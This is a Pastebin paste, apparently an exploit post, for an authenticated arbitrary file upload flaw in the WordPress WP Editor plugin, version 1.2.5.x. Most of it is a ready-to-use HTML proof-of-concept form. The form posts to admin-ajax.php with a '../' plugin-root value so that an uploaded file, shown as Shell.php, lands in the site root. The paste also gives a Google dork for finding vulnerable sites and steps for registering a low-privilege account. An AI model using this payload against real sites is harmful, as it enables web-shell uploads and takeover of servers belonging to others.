Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!--
- \ \ / (_)_ __ _ _ ___\ \/ / _ \ ____
- \ \ / /| | '__| | | / __|\ /| | | |_ /
- \ V / | | | | |_| \__ \/ \| |_| |/ /
- \_/ |_|_| \__,_|___/_/\_\____//___|
- -->
- #########################################################
- # Exploit Title: Wordpress WP Editor Authenticated Arbitrary File Upload Vulnerability
- # Category: webapps
- # Software Link: https://wordpress.org/plugins/wp-editor/
- # version affected : 1.2.5.x
- # Google Dork : inurl:/wp-content/plugins/wp-editor/
- ########################################################
- -------------------------------------------------------------------------------
- # [-]Proof of Concept
- <html>
- <head>
- </head>
- <body>
- <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="post" enctype="multipart/form-data">
- <input type="hidden" name="action" value="upload_files" />
- <input type="hidden" name="current_plugin_root" value="../" />
- <input type="hidden" name="directory" value="" />
- <input type="file" name="file-0" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html>
- #
- # logged in to Wordpress as a "subscriber level or higher user"
- #
- # Add User subscriber
- # /wp-login.php?action=register
- #
- # upload the chosen file using The following proof of concept
- # the Uploaded file will be in the root directory of the WordPress installation
- # http://www.Target.com/Shell.php
- -------------------------------------------------------------------------------
- solution :
- update to the latest version
- Video
- https://youtu.be/wShvHCecPtg
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement